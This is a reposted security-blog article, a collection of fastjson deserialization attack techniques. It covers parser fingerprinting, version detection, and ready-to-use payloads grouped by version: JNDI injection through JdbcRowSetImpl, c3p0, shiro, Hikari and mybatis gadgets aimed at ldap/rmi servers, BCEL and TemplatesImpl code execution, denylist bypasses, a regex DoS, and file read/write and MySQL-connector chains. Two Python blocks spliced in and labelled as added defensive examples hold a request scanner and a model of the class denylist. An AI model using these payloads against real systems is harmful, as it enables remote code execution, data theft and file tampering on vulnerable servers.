A Collection of Fastjson Tricks and Techniques

Posted by admin, 2024-08-12 21:00:31

1. Determining whether fastjson is in use

Identifying fastjson

DNSLOG

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog.com"}}
{{"@type":"java.net.URL","val":"http://dnslog.com"}:"a"}

Based on parsing differences

{"a":new a(1),"b":x'11',/**/"c":Set[{}{}],"d":"\u0000\x00"}
{"ext":"blue","name":{"$ref":"$.ext"}}

Based on the response status

{"@type":"whatever"}

Identifying org.json

Special characters

{a:'\r'}

Identifying gson

Floating-point precision loss

{a:1.111111111111111111111111111}

Comment characters

#\r\n{a:1}

Identifying jackson

Floating-point precision loss

{a:1.111111111111111111111111111}

Comment characters

{a:1}/*#aaaa

Single quotes are not supported as delimiters

{'a':'b'}

Extra class members

{"name":"a","age":18}

If the target echoes detailed error messages, break the JSON structure slightly, for example add an extra { or simply replace {} with a, and the error text shows whether it is jackson.

If the target does not echo detailed errors and only returns a 500 or a generic error, use the fact that jackson rejects unknown properties while fastjson allows them.

For example, the original JSON is:

{"pageNumber":1,"pageSize":1}

Add an unrelated key-value pair:

{"pageNumber":1,"pageSize":1,"test":1}

jackson will return an error, while fastjson will not and the response will be exactly the same as before.

2. Version detection

Detection without error messages

[No error] 1.2.83 / 1.2.24    [Error] 1.2.25-1.2.80

{"zero":{"@type":"java.lang.Exception","@type":"org.XxException"}}

[No error] 1.2.24-1.2.68    [Error] 1.2.70-1.2.83

{"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}

[No error] 1.2.24-1.2.47    [Error] 1.2.48-1.2.83

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl"
    }
}

[No error] 1.2.24    [Error] 1.2.25-1.2.83

{"zero": {"@type": "com.sun.rowset.JdbcRowSetImpl"}}

Delay-based detection

Same principle as an SSRF check: a request to a port that is open on the local machine returns without delay, while a request to a closed port is delayed.

fastjson 1.1.15-1.2.24

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName","autoCommit":true}

Generic payload, usable in parseObject scenarios

{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:8088/badClassName","autoCommit":true}}""}

fastjson 1.2.9-1.2.47

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:808/badNameClass",
        "autoCommit":true
    }
}

Generic payload, usable in parseObject scenarios

{"@type":"com.alibaba.fastjson.JSONObject",{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:8088/badNameClass",
        "autoCommit":true
    }
}}""}

Fastjson 1.2.36 - 1.2.62

Detection using the regex DoS bug: keep appending "a" characters until the response is delayed.

{
    "regex":{
        "$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
    },
    "blue":"aaaaaaaaaaaa!"
}

Reference: https://mp.weixin.qq.com/s/5mO1L5o8j_m6RYM6nO-pAA

Exception echo

The exception message echoes the exact fastjson version number

{
  "@type": "java.lang.AutoCloseable"

DNS detection

This mainly relies on the version in which each class was added to the denylist, so its accuracy is not high.

Principle: the key point is that MiscCodec creates a new URL while handling the value, and the subsequent map#put triggers hash computation of the key. It is easy to understand if you know the URLDNS gadget chain.

fastjson <1.2.43

{"@type":"java.net.URL","val":"http://dnslog"}
{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}

fastjson <1.2.48

{"@type":"java.net.InetAddress","val":"dnslog"}

fastjson <1.2.68

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
Set[{"@type":"java.net.URL","val":"http://dnslog"}]
Set[{"@type":"java.net.URL","val":"http://dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{{"@type":"java.net.URL","val":"http://dnslog"}:0

Precisely probing whether autoType is enabled

[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}]

Detecting the key RCE versions

Version 1.2.24: use the delay-based detection above.

Version 1.2.47

[
  {
    "@type": "java.lang.Class",
    "val": "java.io.ByteArrayOutputStream"
  },
  {
    "@type": "java.io.ByteArrayOutputStream"
  },
  {
    "@type": "java.net.InetSocketAddress"
    {
      "address":,
      "val": "dnslog"
    }
  }
]

Version 1.2.68

[
  {
    "@type": "java.lang.AutoCloseable",
    "@type": "java.io.ByteArrayOutputStream"
  },
  {
    "@type": "java.io.ByteArrayOutputStream"
  },
  {
    "@type": "java.net.InetSocketAddress"
    {
      "address":,
      "val": "dnslog"
    }
  }
]

Version 1.2.80 detection: if two DNS requests are received, the version is 1.2.83; if only one DNS request is received, the version is 1.2.80.

[
  {
    "@type": "java.lang.Exception",
    "@type": "com.alibaba.fastjson.JSONException",
    "x": {
      "@type": "java.net.InetSocketAddress"
      {
        "address":,
        "val": "first.dnslog.cn"
      }
    }
  },
  {
    "@type": "java.lang.Exception",
    "@type": "com.alibaba.fastjson.JSONException",
    "message": {
      "@type": "java.net.InetSocketAddress"
      {
        "address":,
        "val": "second.dnslog.cn"
      }
    }
  }
]
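Every probe in sections 1 and 2 above relies on one of two things: syntax that only a lenient parser accepts, or an @type key (often doubled, or placed on a java.net.* class next to a val). The following Python scanner is an added defensive example, not part of the original article; it shows how a gateway or log-review job can flag such bodies: it parses strictly (so parser-specific syntax is rejected outright), keeps duplicate keys that a dict would collapse, and reports every @type, duplicate @type, java.net resolver and JSONPath filter inside a $ref. The sample bodies, hostnames and function names are constructed for this example.

```python
"""Scan JSON request bodies for fastjson parser probes (added defensive
example, not from the original article)."""
import json
import re

# Constructed sample bodies. The first two are ordinary application input;
# the others follow the shapes of the probes above, with placeholder hosts.
SAMPLES = {
    "benign": '{"pageNumber":1,"pageSize":1}',
    "benign_extra_key": '{"pageNumber":1,"pageSize":1,"test":1}',
    "dns_probe": '{"@type":"java.net.Inet4Address","val":"probe.example.invalid"}',
    "double_type": '{"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}',
    "class_cache": '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                   '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl"}}',
    "redos": '''{"regex":{"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"},"blue":"aaaaaaaaaaaa!"}''',
    "nonstandard": '''{"a":new a(1),"b":x'11',/**/"c":Set[{}{}]}''',
}


class JsonObject(list):
    """A JSON object kept as an ordered list of (key, value) pairs, so a
    repeated key such as a second "@type" survives parsing; a dict would
    silently keep only the last value and hide the duplicate."""


def parse_strict(body: str):
    """RFC 8259 parse. Raises ValueError on fastjson-only syntax (unquoted
    keys, single quotes, comments, new a(1), Set[...], objects used as keys)."""
    return json.loads(body, object_pairs_hook=JsonObject)


def walk_objects(node, path="$"):
    """Yield (json_path, JsonObject) for every object anywhere in the tree."""
    if isinstance(node, JsonObject):
        yield path, node
        for key, value in node:
            yield from walk_objects(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk_objects(value, f"{path}[{index}]")


# JSONPath filter syntax seen in the regex-DoS probes: rlike, = /.../ or =~.
REGEX_FILTER = re.compile(r"\brlike\b|=\s*/|=~")


def scan_body(body: str) -> dict:
    """Return {"strict_json": bool, "findings": [...]}; an empty findings list
    means plain JSON with no @type key and no JSONPath filter in a $ref."""
    try:
        tree = parse_strict(body)
    except ValueError:
        return {"strict_json": False,
                "findings": ["body is not strict JSON (parser-specific syntax)"]}
    findings = []
    for path, obj in walk_objects(tree):
        keys = [k for k, _ in obj]
        types = [v for k, v in obj if k == "@type" and isinstance(v, str)]
        for type_name in types:
            findings.append(f"@type at {path}: {type_name}")
        if len(types) > 1:
            findings.append(f"duplicate @type at {path} (expectClass-style probe)")
        if "val" in keys and any(t.startswith("java.net.") for t in types):
            findings.append(f"java.net resolver with val at {path} (DNS/delay probe)")
        for key, value in obj:
            if key == "$ref" and isinstance(value, str) and REGEX_FILTER.search(value):
                findings.append(f"JSONPath filter in $ref at {path} (regex DoS pattern)")
    return {"strict_json": True, "findings": findings}


def scan_all(samples=SAMPLES) -> dict:
    """Scan every sample; returns {name: result}."""
    return {name: scan_body(body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, result in scan_all().items():
        print(name, result)
```

Run it stand-alone to print each sample's findings. In practice, point scan_body at the decoded request body before it reaches the Java parser and treat any @type finding as a block-or-alert condition: a legitimate client of a typed API never needs to name server-side classes, and the strict-parse failure on its own already separates the fingerprinting probes from real traffic.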

3. Exploitation by version

Besides the Fastjson version, the JDK version, the middleware version and the versions of third-party dependencies also have to be taken into account.

JDK version restrictions on JNDI injection: RMI-based exploitation works on JDK <= 6u141, 7u131, 8u121; LDAP-based exploitation works on JDK <= 6u211, 7u201, 8u191. (Bypasses also exist for higher versions.)

For bypasses on higher versions, see https://github.com/veracode-research/rogue-jndi

  1. jndi
    1. JdbcRowSetImpl
    2. C3p0#JndiRefForwardingDataSource
    3. JndiDataSourceFactory
  2. bcel
    1. tomcat#dbcp
    2. ibatis
  3. TemplatesImpl

Fastjson 1.2.22-1.2.24

JdbcRowSetImpl

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName","autoCommit":true}

c3p0#JndiRefForwardingDataSource

Worth trying when JdbcRowSetImpl does not succeed

{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://127.0.0.1:1099/badClassName","loginTimeout":0}

shiro#JndiObjectFactory

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://127.0.0.1:9050/exploit"}

shiro#JndiRealmFactory

{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":"rmi://127.0.0.1:9050/exploit"}

1.2.33 <= fastjson <= 1.2.36

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL..."
            }
        } : "ddd"
    }
}

1.2.37 <= fastjson <= 1.2.47

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        "y": {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL$..",
                "$ref":"$.x.y.c.connection"
            }
        }
    }
}

Others

{
  "@type": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
  "key": {
    "@type": "java.lang.Class",
    "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
  },
  "driverClassLoader": {
    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
  },
  "driver": "$$BCEL$$xxxxxxx"
}

TemplatesImpl

The exploitation conditions are strict, but it can be used when the target has no outbound network access.

The parseObject() call must be made with the Feature.SupportNonPublicField parameter.

_bytecodes must be base64-encoded.

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["<base64-encoded bytecode, omitted on the page>"],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}

Fastjson 1.2.25-1.2.41

Starting with 1.2.25, TypeUtils.loadClass was replaced by the checkAutoType() function, which added a denylist and an allowlist.

autoTypeSupport defaults to false.

When autoTypeSupport is false, the denylist is checked first and then the allowlist; if the allowlist matches, the class is loaded directly, otherwise an error is raised.

When autoTypeSupport is true, the allowlist is checked first and a match loads the class; otherwise the denylist is checked.

1.2.25 denylist

bsh
com.mchange
com.sun.
java.lang.Thread
java.net.Socket
java.rmi
javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework
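The two orderings described above decide whether a class name that is on neither list gets loaded. The following Python model is an added illustration, not fastjson's own code: it encodes that ordering using the 1.2.25 denylist entries listed above and a hypothetical application allowlist (com.example.app.model.). It adds one step the text does not state, which is an assumption of the model: the class name is normalized (leading '[' and any L...; wrapper removed) before prefix matching, the defensive counterpart of the decorated-name bypasses covered further down this page. The model makes concrete that with autoTypeSupport=false an unlisted class is rejected by default, while with autoTypeSupport=true the denylist becomes the only barrier.

```python
"""Model of fastjson 1.2.25's checkAutoType() ordering (added illustration,
not fastjson source). Prefix matching on normalized class names."""

# Denylist prefixes as listed in the 1.2.25 denylist above.
DENY_PREFIXES = (
    "bsh", "com.mchange", "com.sun.", "java.lang.Thread", "java.net.Socket",
    "java.rmi", "javax.xml", "org.apache.bcel", "org.apache.commons.beanutils",
    "org.apache.commons.collections.Transformer",
    "org.apache.commons.collections.functors",
    "org.apache.commons.collections4.comparators",
    "org.apache.commons.fileupload", "org.apache.myfaces.context.servlet",
    "org.apache.tomcat", "org.apache.wicket.util", "org.codehaus.groovy.runtime",
    "org.hibernate", "org.jboss", "org.mozilla.javascript", "org.python.core",
    "org.springframework",
)

# Hypothetical application allowlist: only the app's own model package.
ACCEPT_PREFIXES = ("com.example.app.model.",)


def normalize_class_name(name: str) -> str:
    """Strip JVM descriptor decorations so prefix matching sees the real
    class name: any leading '[' (array descriptor) and any number of
    'L...;' wrappers. This normalization is an assumption of the model;
    matching the raw string is what decorated names slip past."""
    while name.startswith("["):
        name = name[1:]
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def check_auto_type(name: str, auto_type_support: bool,
                    deny=DENY_PREFIXES, accept=ACCEPT_PREFIXES):
    """Return (allowed, reason) following the ordering described in the text.

    auto_type_support=False: denylist first, then allowlist; anything else
    is rejected (default deny).
    auto_type_support=True: allowlist first, then denylist; anything else
    is accepted (default allow, so the denylist is the only barrier).
    """
    normalized = normalize_class_name(name)
    denied = normalized.startswith(tuple(deny))
    accepted = normalized.startswith(tuple(accept))
    if not auto_type_support:
        if denied:
            return False, "denylist"
        if accepted:
            return True, "allowlist"
        return False, "autoType disabled and class not on allowlist"
    if accepted:
        return True, "allowlist"
    if denied:
        return False, "denylist"
    return True, "autoType enabled and class not on denylist"


def compare_modes(name: str) -> dict:
    """Evaluate one class name under both settings, to see whether enabling
    autoTypeSupport widens exposure for that name."""
    return {
        "autoTypeSupport=false": check_auto_type(name, False),
        "autoTypeSupport=true": check_auto_type(name, True),
    }


if __name__ == "__main__":
    for candidate in ("com.example.app.model.Order",
                      "Lcom.sun.rowset.JdbcRowSetImpl;",
                      "org.example.NotListedAnywhere"):
        print(candidate, compare_modes(candidate))
```

The practical reading is the one the text implies: leave autoTypeSupport off, register only the application's own classes on an explicit accept list, and never rely on the denylist alone, since every later bypass on this page is a denylist miss. Releases from 1.2.68 onward additionally offer safeMode, which disables @type handling entirely and is the simplest setting when polymorphic deserialization is not needed.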

Exploit

Condition: autoType must be enabled.

Adding an L before the class name and a ; after it bypasses the denylist.

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/badNameClass","autoCommit":true}

Fastjson 1.2.25-1.2.42

Starting with version 1.2.42, the plaintext denylist was replaced by a hash denylist.

Collected by the following author:

https://github.com/LeadroyaL/fastjson-blacklist

Exploit

Condition: autoType must be enabled.

Double-write bypass

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/badNameClass","autoCommit":true}

Fastjson 1.2.25-1.2.43

Exploit

Condition: autoType must be enabled.

Bypass by adding [{

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/badNameClass","autoCommit":true}

Fastjson 1.2.25-1.2.45

Condition: autoType must be enabled.

1.2.45 fixed the previous issues, but a third-party component can still be used to bypass it.

Requires mybatis, version 3.x.x with 3.x < 3.5.0.

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/badNameClass"}}

Fastjson 1.2.25-1.2.47 universal

Universal exploitation via the cache; the cache was changed to disabled by default in 1.2.48.

The principle is to use java.lang.Class to load the JdbcRowSetImpl class into the Map cache, thereby bypassing the AutoType check.

There are two main version ranges:

  • 1.2.25-1.2.32: exploitable only when AutoTypeSupport is not enabled; not exploitable when it is enabled
  • 1.2.33-1.2.47: exploitable regardless of whether AutoTypeSupport is enabled

PoC:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
    }
}

Fastjson 1.2.36 - 1.2.62

Regular expression denial-of-service vulnerability

{
    "regex":{
        "$ref":"$[blue = /^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"
    },
    "blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}
{
    "regex":{
        "$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
    },
    "blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}

1.2.5 <= Fastjson <= 1.2.59

AutoType must be enabled

{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}

1.2.5 <= Fastjson <= 1.2.60

autoType must be enabled:

{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://10.10.20.166:1099/ExportObject"}

{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://10.10.20.166:1389/ExportObject"}

1.2.5 <= Fastjson <= 1.2.61

{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:1389/Exploit","Object":"a"}

Fastjson <1.2.62

  • AutoType must be enabled;
  • Fastjson <= 1.2.62;
  • Subject to the JDK version restrictions on JNDI injection;
  • The target server must have the xbean-reflect package;

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://localhost:1389/Exploit"}, "namespace":""}

fastjson<=1.2.66

Prerequisites

  • AutoType enabled;
  • Fastjson <= 1.2.66;
  • Subject to the JDK version restrictions on JNDI injection;
  • The org.apache.shiro.jndi.JndiObjectFactory class requires the shiro-core package;
  • The br.com.anteros.dbcp.AnterosDBCPConfig class requires the Anteros-Core and Anteros-DBCP packages;
  • The com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig class requires the ibatis-sqlmap and jta packages;

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://localhost:1389/Exploit"], "Realms":[""]}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}

File-write payload applicable to JDK 11 and above:

{
    "@type": "java.lang.AutoCloseable",
    "@type": "sun.rmi.server.MarshalOutputStream",
    "out": {
        "@type": "java.util.zip.InflaterOutputStream",
        "out": {
           "@type": "java.io.FileOutputStream",
           "file": "/tmp/asdasd",
           "append": true
        },
        "infl": {
           "input": {
               "array": "eJxLLE5JTCkGAAh5AnE=",
               "limit": 14
           }
        },
        "bufLen": "100"
    },
    "protocolVersion": 1
}

fastjson<=1.2.67

Prerequisites

  • AutoType enabled;
  • Fastjson <= 1.2.67;
  • Subject to the JDK version restrictions on JNDI injection;
  • The org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup class requires the ignite-core, ignite-jta and jta dependencies;
  • The org.apache.shiro.jndi.JndiObjectFactory class requires the shiro-core and slf4j-api dependencies;

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":["ldap://localhost:1389/Exploit"], "tm": {"$ref":"$.tm"}}

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/Exploit","instance":{"$ref":"$.instance"}}

fastjson<=1.2.68

  • Fastjson <= 1.2.68;
  • The exploited class must be a subclass or implementation of expectClass and must not be in the denylist;

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.caucho.config.types.ResourceRef","lookupName":"ldap://localhost:1389/Exploit","value": {"$ref":"$.value"}}

No need to enable AutoType: this bypasses the checkAutoType() check directly and triggers execution:

{"@type":"java.lang.AutoCloseable","@type":"vul.VulAutoCloseable","cmd":"calc"}

Reading files

{"@type":"java.lang.AutoCloseable","@type":"org.eclipse.core.internal.localstore.SafeFileOutputStream","tempPath":"C:/Windows/win.ini","targetPath":"D:/wamp64/www/win.txt"}

Writing files

{
  "@type": "java.lang.AutoCloseable",
  "@type": "java.io.FileOutputStream",
  "file": "/tmp/nonexist",
  "append": "false"
}
{
  "@type": "java.lang.AutoCloseable",
  "@type": "java.io.FileWriter",
  "file": "/tmp/nonexist",
  "append": "false"
}

Writing files

{
    "stream": {
        "@type": "java.lang.AutoCloseable",
        "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
        "targetPath": "D:/wamp64/www/hacked.txt",
        "tempPath": "D:/wamp64/www/test.txt"
    },
    "writer": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.esotericsoftware.kryo.io.Output",
        "buffer": "cHduZWQ=",
        "outputStream": {
            "$ref": "$.stream"
        },
        "position": 5
    },
    "close": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.sleepycat.bind.serial.SerialOutput",
        "out": {
            "$ref": "$.writer"
        }
    }
}

Writing files

{
    'stream':
    {
        '@type':"java.lang.AutoCloseable",
        '@type':'java.io.FileOutputStream',
        'file':'/tmp/nonexist',
        'append':false
    },
    'writer':
    {
        '@type':"java.lang.AutoCloseable",
        '@type':'org.apache.solr.common.util.FastOutputStream',
        'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=',
        'sink':
        {
            '$ref':'$.stream'
        },
        'start':38
    },
    'close':
    {
        '@type':"java.lang.AutoCloseable",
        '@type':'org.iq80.snappy.SnappyOutputStream',
        'out':
        {
            '$ref':'$.writer'
        }
    }
}

For JDK 8/10:

{
  "@type": "java.lang.AutoCloseable",
  "@type": "sun.rmi.server.MarshalOutputStream",
  "out": {
    "@type": "java.util.zip.InflaterOutputStream",
    "out": {
      "@type": "java.io.FileOutputStream",
      "file": "dst",
      "append": "false"
    },
    "infl": {
      "input": "eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="
    },
    "bufLen": 1048576
  },
  "protocolVersion": 1
}

JDK 8

  • The position value (the length written) must equal the length of the data before base64 encoding.

{
    "stream": {
        "@type": "java.lang.AutoCloseable",
        "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
        "targetPath": "f:/pwn.txt",
        "tempPath": ""
    },
    "writer": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.esotericsoftware.kryo.io.Output",
        "buffer": "YjF1M3I=",
        "outputStream": {
            "$ref": "$.stream"
        },
        "position": 5
    },
    "close": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.sleepycat.bind.serial.SerialOutput",
        "out": {
            "$ref": "$.writer"
        }
    }
}
Mysqlconnector 5.1.x

{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"mysql.host","portToConnectTo":3306,"info":{"user":"user","password":"pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS": "1"},"databaseToConnectTo":"dbname","url":""}

Mysqlconnector 6.0.2 or 6.0.3

{"@type": "java.lang.AutoCloseable","@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection","proxy":{"connectionString":{"url": "jdbc:mysql://localhost:3306/foo?allowLoadLocalInfile=true"}}}

Mysqlconnector 6.x or < 8.0.20

{"@type":"java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection","proxy":{"@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy","connectionUrl":{"@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", "masters": [{"host":"mysql.host"}], "slaves":[], "properties":{"host":"mysql.host","user":"user","dbname":"dbname","password":"pass","queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"}}}}

Originally published on the WeChat public account TimeAxis Sec: Fastjson姿势技巧集合

Reposted at CN-SEC: http://cn-sec.com/archives/3056926.html